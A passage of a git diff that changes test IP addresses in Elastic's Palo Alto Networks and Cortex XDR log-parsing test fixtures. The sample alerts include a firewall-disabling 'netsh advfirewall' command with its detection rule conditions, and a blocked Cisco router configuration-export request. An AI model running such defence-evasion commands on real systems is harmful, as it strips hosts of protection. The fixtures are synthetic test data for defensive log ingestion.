States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -16493,27 +16633,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -16532,7 +16674,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16547,7 +16689,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16569,7 +16711,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:yNIHAg1M08IChho9000mtg7zUOc=" + "community_id": "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=" } }, "sequence_number": 32091211, @@ -16589,8 +16731,8 @@ ], "network": { "community_id": [ - "1:xl0u/+SYGciPtyPuv813G1aTEdI=", - "1:yNIHAg1M08IChho9000mtg7zUOc=" + "1:J9zizMWz2sU5dX8BXgKIQbfXqFU=", + "1:GHuJcKZG3OiYe6oybi/KhmMCXwk=" ], "transport": "udp", "application": "dns", @@ -16630,14 +16772,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942214565Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031958300Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", diff --git a/packages/panw/manifest.yml b/packages/panw/manifest.yml index 4f8e8be2167..0ed7312882c 100644 --- a/packages/panw/manifest.yml +++ b/packages/panw/manifest.yml @@ -1,6 +1,6 @@ name: panw title: Palo Alto Networks Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect PAN-OS firewall monitoring logs from Palo Alto Networks devices with Elastic Agent. type: integration diff --git a/packages/panw_cortex_xdr/changelog.yml b/packages/panw_cortex_xdr/changelog.yml index 4fbf5e19ae0..5b24b1bec12 100644 --- a/packages/panw_cortex_xdr/changelog.yml +++ b/packages/panw_cortex_xdr/changelog.yml @@ -1,9 +1,14 @@ # newer versions go on top +- version: "0.2.5" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.4" changes: - description: Uniform with guidelines type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.3" changes: - description: Update Title and Description. diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json index 62b50ed44b5..7a8dcaaad14 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json @@ -588,7 +588,7 @@ "event": { "severity": 2, "reason": "Bioc Event", - "ingested": "2021-10-14T10:31:16.679953057Z", + "ingested": "2021-12-09T13:44:33.260263600Z", "original": "{\"external_id\":\"52517f58-0201-4d66-b5c4-00922664737e\",\"severity\":\"low\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1588792761983,\"local_insert_ts\":1588792547132,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":\"TAMPERING\",\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":[\"T1089 - Disabling Security Tools\"],\"mitre_tactic_id_and_name\":[\"TA0005 - Defense Evasion\"],\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":\"Windows 10 [10.0 (Build 17763)]\",\"agent_data_collection_status\":null,\"mac\":null,\"events\": {\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":\"AAABcetp1dDSqW1uAAY8Vw==\",\"event_type\":\"Registry Event\",\"event_timestamp\":1588792514182,\"actor_process_instance_id\":\"AdYj2qtgRtAAADjMAAAAAA==\",\"actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\",\"actor_process_image_name\":\"netsh.exe\",\"actor_process_command_line\":\"netsh advfirewall set allprofiles state off\",\"actor_process_signature_status\":\"Signed\",\"actor_process_signature_vendor\":\"Microsoft Corporation\",\"actor_process_image_sha256\":\"d70d165b6706c61c56f2ca91307f4bbdb9846acae1da3cfd84bf978ffb21af23\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_process_os_pid\":14540,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"causality_actor_process_execution_time\":1588792508244,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":\"0\",\"action_registry_key_name\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\",\"action_registry_value_name\":\"EnableFirewall\",\"action_registry_full_key\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\\\\EnableFirewall\",\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"os_actor_process_image_name\":\"svchost.exe\",\"os_actor_process_command_line\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k LocalServiceNoNetworkFirewall -p\",\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":\"N/A\",\"os_actor_process_image_sha256\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"os_actor_process_causality_id\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":\"1800\",\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":null,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},\"alert_id\":\"884236\",\"detection_timestamp\":1588792514182,\"name\":\"Windows Firewall disabled via Registry\",\"category\":\"Tampering\",\"endpoint_id\":\"98a86ba773fbe44f6b41ba2216fe2f53\",\"description\":[{\"pretty_name\":\"Registry\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"action type\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"action\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"action\"},{\"pretty_name\":\"Create Key\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Set Value\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"key name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"*system\\\\*\\\\services\\\\sharedaccess\\\\parameters\\\\firewallpolicy\\\\*\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"data\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"0\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"value name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"donotallowexceptions\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"enablefirewall\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"Process\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Symantec Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Symantec Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Host\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"host os\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_agent\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_agent\"},{\"pretty_name\":\"windows\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_agent\"}],\"host_ip\":[\"192.168.88.1\",\"192.168.153.1\",\"10.10.10.10\"],\"host_name\":\"testhostname-123\",\"mac_addresses\":null,\"source\":\"XDR BIOC\",\"action\":\"DETECTED\",\"action_pretty\":\"Detected\"}", "kind": "alert", "created": "2020-05-06T19:15:14.182Z", diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log index c6f4a9ba962..b10c546d4b6 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log @@ -1,2 +1,2 @@ -{"external_id":"396239671","severity":"high","matching_status":"UNMATCHABLE","end_match_attempt_ts":null,"local_insert_ts":1626347122923,"bioc_indicator":null,"matching_service_rule_id":null,"attempt_counter":null,"bioc_category_enum_key":null,"is_whitelisted":false,"starred":false,"deduplicate_tokens":"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15","filter_rule_id":null,"mitre_technique_id_and_name":null,"mitre_tactic_id_and_name":null,"agent_version":null,"agent_device_domain":null,"agent_fqdn":null,"agent_os_type":"NO_HOST","agent_os_sub_type":null,"agent_data_collection_status":null,"mac":"4c:ae:a3:8e:c8:6a","events":{"agent_install_type":"NA","agent_host_boot_time":null,"event_sub_type":null,"module_id":null,"association_strength":10,"dst_association_strength":10,"story_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_type":"Network Connections","event_timestamp":1626346867000,"actor_process_instance_id":null,"actor_process_image_path":null,"actor_process_image_name":null,"actor_process_command_line":null,"actor_process_signature_status":"N/A","actor_process_signature_vendor":null,"actor_process_image_sha256":null,"actor_process_image_md5":null,"actor_process_causality_id":null,"actor_causality_id":null,"actor_process_os_pid":null,"actor_thread_thread_id":null,"causality_actor_process_image_name":null,"causality_actor_process_command_line":null,"causality_actor_process_image_path":null,"causality_actor_process_signature_vendor":null,"causality_actor_process_signature_status":"N/A","causality_actor_causality_id":null,"causality_actor_process_execution_time":null,"causality_actor_process_image_md5":null,"causality_actor_process_image_sha256":null,"action_file_path":null,"action_file_name":null,"action_file_md5":null,"action_file_sha256":null,"action_file_macro_sha256":null,"action_registry_data":null,"action_registry_key_name":null,"action_registry_value_name":null,"action_registry_full_key":null,"action_local_ip":"10.10.10.10","action_local_port":58642,"action_remote_ip":"8.8.8.8","action_remote_port":443,"action_external_hostname":"8.8.8.8","action_country":"DK","action_process_instance_id":null,"action_process_causality_id":null,"action_process_image_name":null,"action_process_image_sha256":null,"action_process_image_command_line":null,"action_process_signature_status":"N/A","action_process_signature_vendor":null,"os_actor_effective_username":null,"os_actor_process_instance_id":null,"os_actor_process_image_path":null,"os_actor_process_image_name":null,"os_actor_process_command_line":null,"os_actor_process_signature_status":"N/A","os_actor_process_signature_vendor":null,"os_actor_process_image_sha256":null,"os_actor_process_causality_id":null,"os_actor_causality_id":null,"os_actor_process_os_pid":null,"os_actor_thread_thread_id":null,"fw_app_id":"web-browsing","fw_interface_from":"INTERNET","fw_interface_to":"INTERNET","fw_rule":"INTERNET_INTERNET_GlobalProtect-443","fw_rule_id":null,"fw_device_name":"FW-DEVICE_NAME","fw_serial_number":"12352345","fw_url_domain":"9.9.9.9","fw_email_subject":null,"fw_email_sender":null,"fw_email_recipient":null,"fw_app_subcategory":"internet-utility","fw_app_category":"general-internet","fw_app_technology":"browser-based","fw_vsys":"vsys1","fw_xff":null,"fw_misc":"7.7.7.7/cgi-bin/config.exp","fw_is_phishing":"No","dst_agent_id":"6.6.6.6","dst_causality_actor_process_execution_time":null,"dns_query_name":null,"dst_action_external_hostname":null,"dst_action_country":"US","dst_action_external_port":null,"contains_featured_host":"NO","contains_featured_user":"NO","contains_featured_ip":"NO","image_name":null,"container_id":null,"cluster_name":null,"user_name":null},"alert_id":"2879211","detection_timestamp":1626346849000,"name":"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability","category":"Vulnerability","endpoint_id":"192.168.2.2","description":"Info-Leak (7.7.7.7/cgi-bin/config.exp)","host_ip":["192.168.2.2"],"host_name":null,"mac_addresses":["ab:ae:f5:sd:c8:6a"],"source":"PAN NGFW","action":"BLOCKED_9","action_pretty":"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)"} +{"external_id":"396239671","severity":"high","matching_status":"UNMATCHABLE","end_match_attempt_ts":null,"local_insert_ts":1626347122923,"bioc_indicator":null,"matching_service_rule_id":null,"attempt_counter":null,"bioc_category_enum_key":null,"is_whitelisted":false,"starred":false,"deduplicate_tokens":"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15","filter_rule_id":null,"mitre_technique_id_and_name":null,"mitre_tactic_id_and_name":null,"agent_version":null,"agent_device_domain":null,"agent_fqdn":null,"agent_os_type":"NO_HOST","agent_os_sub_type":null,"agent_data_collection_status":null,"mac":"4c:ae:a3:8e:c8:6a","events":{"agent_install_type":"NA","agent_host_boot_time":null,"event_sub_type":null,"module_id":null,"association_strength":10,"dst_association_strength":10,"story_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_id":"MzYzOTQ0MDE1MDI4OTE3NDUyNA==","event_type":"Network Connections","event_timestamp":1626346867000,"actor_process_instance_id":null,"actor_process_image_path":null,"actor_process_image_name":null,"actor_process_command_line":null,"actor_process_signature_status":"N/A","actor_process_signature_vendor":null,"actor_process_image_sha256":null,"actor_process_image_md5":null,"actor_process_causality_id":null,"actor_causality_id":null,"actor_process_os_pid":null,"actor_thread_thread_id":null,"causality_actor_process_image_name":null,"causality_actor_process_command_line":null,"causality_actor_process_image_path":null,"causality_actor_process_signature_vendor":null,"causality_actor_process_signature_status":"N/A","causality_actor_causality_id":null,"causality_actor_process_execution_time":null,"causality_actor_process_image_md5":null,"causality_actor_process_image_sha256":null,"action_file_path":null,"action_file_name":null,"action_file_md5":null,"action_file_sha256":null,"action_file_macro_sha256":null,"action_registry_data":null,"action_registry_key_name":null,"action_registry_value_name":null,"action_registry_full_key":null,"action_local_ip":"10.10.10.10","action_local_port":58642,"action_remote_ip":"175.16.199.1","action_remote_port":443,"action_external_hostname":"175.16.199.1","action_country":"DK","action_process_instance_id":null,"action_process_causality_id":null,"action_process_image_name":null,"action_process_image_sha256":null,"action_process_image_command_line":null,"action_process_signature_status":"N/A","action_process_signature_vendor":null,"os_actor_effective_username":null,"os_actor_process_instance_id":null,"os_actor_process_image_path":null,"os_actor_process_image_name":null,"os_actor_process_command_line":null,"os_actor_process_signature_status":"N/A","os_actor_process_signature_vendor":null,"os_actor_process_image_sha256":null,"os_actor_process_causality_id":null,"os_actor_causality_id":null,"os_actor_process_os_pid":null,"os_actor_thread_thread_id":null,"fw_app_id":"web-browsing","fw_interface_from":"INTERNET","fw_interface_to":"INTERNET","fw_rule":"INTERNET_INTERNET_GlobalProtect-443","fw_rule_id":null,"fw_device_name":"FW-DEVICE_NAME","fw_serial_number":"12352345","fw_url_domain":"9.9.9.9","fw_email_subject":null,"fw_email_sender":null,"fw_email_recipient":null,"fw_app_subcategory":"internet-utility","fw_app_category":"general-internet","fw_app_technolog